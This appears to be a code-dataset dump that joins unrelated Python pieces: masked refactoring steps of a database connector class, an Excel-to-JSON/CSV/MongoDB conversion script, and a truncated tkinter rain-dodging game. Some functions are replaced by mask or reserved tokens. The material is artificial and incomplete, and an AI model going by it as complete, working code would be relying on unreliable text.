FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-4": "<mask token>\nfrom SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL\n\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\"\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0],\n element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mai 15 11:34:22 2018\n\n@author: Diogo Leite\n\"\"\"\n\nfrom SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\" \n\n def __init__(self, id_ds_conf_ds = -1, value_configuration = -1, FK_id_configuration_DCT_DCD = -1, FK_id_dataset_DS_DCD = -1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n\n\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD)\n \n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
import os import re import click import pandas as pd from pymongo import MongoClient from pathlib import Path, PurePath def extract_dir_name(input_file): """ creates a directory path based on the specified file name :param input_file: file bane :return: full path, minus extension """ fname = PurePath(input_file).__str__() s = fname.split('.') name = '.'.join(s[:-1]) return name def prep_file_name(path, file): """ append the original path and file name * strips special chars * remove spaces (replace with underscore) * convert to lowercase :param path: the path part of the new file name :param file: the original file name :return: sanitized name """ name = path.__str__() + '~' + file.__str__() name = name.lower() name = name.replace(' ', '_') name = re.sub('[^a-z0-9\-_!.~]+', '', name) return name def open_dir(input_path, patterns): """ Opens the specified input path and returns any located excel file :param patterns: the file extensions to glob over (eg xls, csv) :param input_path: the starting path :return: generator of all found files """ for ext in patterns: for file in Path(input_path).glob('**/*.' + ext): yield file def shred_sheets(subdomain, audit_date, input_file, _format): """ Opens an excel workbook, and converts all sheets to a new file of the specified format :param subdomain: appended to data frame :param audit_date: appended to data fram :param input_file: the path to the excel book :param _format: the format to convert all sheets :return: """ name = extract_dir_name(input_file) fname = PurePath(input_file).name.__str__() try: os.makedirs(name) except: pass wb = pd.ExcelFile(input_file) for ws in wb.sheet_names: data = pd.read_excel(input_file, sheet_name=ws) # add constants data.index.names = ['ix'] data['subdomin'] = subdomain data['audit_date'] = audit_date # strip chars we don't want in colum names cols = data.columns renamed = [] for col in cols: col = re.sub('[^a-zA-Z0-9]', '', col) renamed.append(col) data.columns = renamed # build output formats if _format == 'mongo': client = MongoClient('mongodb://localhost:27017/') db = client.Sitebulb cl = db.August5 try: cl.insert_many(data.to_dict('records')) except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue if _format == 'json' or _format == 'all': try: new_file = os.path.join(name, fname + '~' + ws + '.json') data.to_json(new_file, orient="records") except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue if _format == 'csv' or _format == 'all': try: new_file = os.path.join(name, fname + '~' + ws + '.csv') data.to_csv(new_file) except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue
normal
{ "blob_id": "f831b77850dfe22232092f66705e36970828a75b", "index": 4975, "step-1": "<mask token>\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\ndef shred_sheets(subdomain, audit_date, input_file, _format):\n \"\"\"\n Opens an excel workbook, and converts all sheets to a new file of the specified format\n :param subdomain: appended to data frame\n :param audit_date: appended to data fram\n :param input_file: the path to the excel book\n :param _format: the format to convert all sheets\n :return:\n \"\"\"\n name = extract_dir_name(input_file)\n fname = PurePath(input_file).name.__str__()\n try:\n os.makedirs(name)\n except:\n pass\n wb = pd.ExcelFile(input_file)\n for ws in wb.sheet_names:\n data = pd.read_excel(input_file, sheet_name=ws)\n data.index.names = ['ix']\n data['subdomin'] = subdomain\n data['audit_date'] = audit_date\n cols = data.columns\n renamed = []\n for col in cols:\n col = re.sub('[^a-zA-Z0-9]', '', col)\n renamed.append(col)\n data.columns = renamed\n if _format == 'mongo':\n client = MongoClient('mongodb://localhost:27017/')\n db = client.Sitebulb\n cl = db.August5\n try:\n cl.insert_many(data.to_dict('records'))\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'json' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.json')\n data.to_json(new_file, orient='records')\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'csv' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\n data.to_csv(new_file)\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n", "step-4": "import os\nimport re\nimport click\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom pathlib import Path, PurePath\n\n\ndef extract_dir_name(input_file):\n \"\"\"\n creates a directory path based on the specified file name\n :param input_file: file bane\n :return: full path, minus extension\n \"\"\"\n fname = PurePath(input_file).__str__()\n s = fname.split('.')\n name = '.'.join(s[:-1])\n return name\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\ndef shred_sheets(subdomain, audit_date, input_file, _format):\n \"\"\"\n Opens an excel workbook, and converts all sheets to a new file of the specified format\n :param subdomain: appended to data frame\n :param audit_date: appended to data fram\n :param input_file: the path to the excel book\n :param _format: the format to convert all sheets\n :return:\n \"\"\"\n name = extract_dir_name(input_file)\n fname = PurePath(input_file).name.__str__()\n try:\n os.makedirs(name)\n except:\n pass\n wb = pd.ExcelFile(input_file)\n for ws in wb.sheet_names:\n data = pd.read_excel(input_file, sheet_name=ws)\n data.index.names = ['ix']\n data['subdomin'] = subdomain\n data['audit_date'] = audit_date\n cols = data.columns\n renamed = []\n for col in cols:\n col = re.sub('[^a-zA-Z0-9]', '', col)\n renamed.append(col)\n data.columns = renamed\n if _format == 'mongo':\n client = MongoClient('mongodb://localhost:27017/')\n db = client.Sitebulb\n cl = db.August5\n try:\n cl.insert_many(data.to_dict('records'))\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'json' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.json')\n data.to_json(new_file, orient='records')\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'csv' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\n data.to_csv(new_file)\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n", "step-5": "import os\r\nimport re\r\nimport click\r\nimport pandas as pd\r\nfrom pymongo import MongoClient\r\nfrom pathlib import Path, PurePath\r\n\r\n\r\ndef extract_dir_name(input_file):\r\n \"\"\"\r\n creates a directory path based on the specified file name\r\n :param input_file: file bane\r\n :return: full path, minus extension\r\n \"\"\"\r\n fname = PurePath(input_file).__str__()\r\n s = fname.split('.')\r\n name = '.'.join(s[:-1])\r\n return name\r\n\r\n\r\ndef prep_file_name(path, file):\r\n \"\"\"\r\n append the original path and file name\r\n * strips special chars\r\n * remove spaces (replace with underscore)\r\n * convert to lowercase\r\n :param path: the path part of the new file name\r\n :param file: the original file name\r\n :return: sanitized name\r\n \"\"\"\r\n name = path.__str__() + '~' + file.__str__()\r\n name = name.lower()\r\n name = name.replace(' ', '_')\r\n name = re.sub('[^a-z0-9\\-_!.~]+', '', name)\r\n return name\r\n\r\n\r\ndef open_dir(input_path, patterns):\r\n \"\"\"\r\n Opens the specified input path and returns any located excel file\r\n :param patterns: the file extensions to glob over (eg xls, csv)\r\n :param input_path: the starting path\r\n :return: generator of all found files\r\n \"\"\"\r\n for ext in patterns:\r\n for file in Path(input_path).glob('**/*.' + ext):\r\n yield file\r\n\r\n\r\ndef shred_sheets(subdomain, audit_date, input_file, _format):\r\n \"\"\"\r\n Opens an excel workbook, and converts all sheets to a new file of the specified format\r\n :param subdomain: appended to data frame\r\n :param audit_date: appended to data fram\r\n :param input_file: the path to the excel book\r\n :param _format: the format to convert all sheets\r\n :return:\r\n \"\"\"\r\n name = extract_dir_name(input_file)\r\n fname = PurePath(input_file).name.__str__()\r\n try:\r\n os.makedirs(name)\r\n except:\r\n pass\r\n\r\n wb = pd.ExcelFile(input_file)\r\n for ws in wb.sheet_names:\r\n data = pd.read_excel(input_file, sheet_name=ws)\r\n # add constants\r\n data.index.names = ['ix']\r\n data['subdomin'] = subdomain\r\n data['audit_date'] = audit_date\r\n\r\n # strip chars we don't want in colum names\r\n cols = data.columns\r\n renamed = []\r\n for col in cols:\r\n col = re.sub('[^a-zA-Z0-9]', '', col)\r\n renamed.append(col)\r\n\r\n data.columns = renamed\r\n\r\n # build output formats\r\n if _format == 'mongo':\r\n client = MongoClient('mongodb://localhost:27017/')\r\n db = client.Sitebulb\r\n cl = db.August5\r\n\r\n try:\r\n cl.insert_many(data.to_dict('records'))\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n\r\n if _format == 'json' or _format == 'all':\r\n try:\r\n new_file = os.path.join(name, fname + '~' + ws + '.json')\r\n data.to_json(new_file, orient=\"records\")\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n\r\n if _format == 'csv' or _format == 'all':\r\n try:\r\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\r\n data.to_csv(new_file)\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n", "step-ids": [ 1, 2, 3, 5, 6 ] }
[ 1, 2, 3, 5, 6 ]
<|reserved_special_token_0|> def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) <|reserved_special_token_0|> def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 <|reserved_special_token_0|> def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) <|reserved_special_token_0|> def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) <|reserved_special_token_0|> def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane <|reserved_special_token_0|> def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) <|reserved_special_token_0|> def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) <|reserved_special_token_0|> def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) <|reserved_special_token_0|> def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick <|reserved_special_token_0|> def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. rainSpeed != None): data.enter = data.click canvas.create_image(data.medX, data.enterX, image=data.enter) canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) <|reserved_special_token_0|> def setEverything(data): if data.yourSpeed == 'slow': data.speed = 6 elif data.yourSpeed == 'medium': data.speed = 10 elif data.yourSpeed == 'fast': data.speed = 14 if data.rainSpeed == 'thunderstorm': data.rSpeed = 7 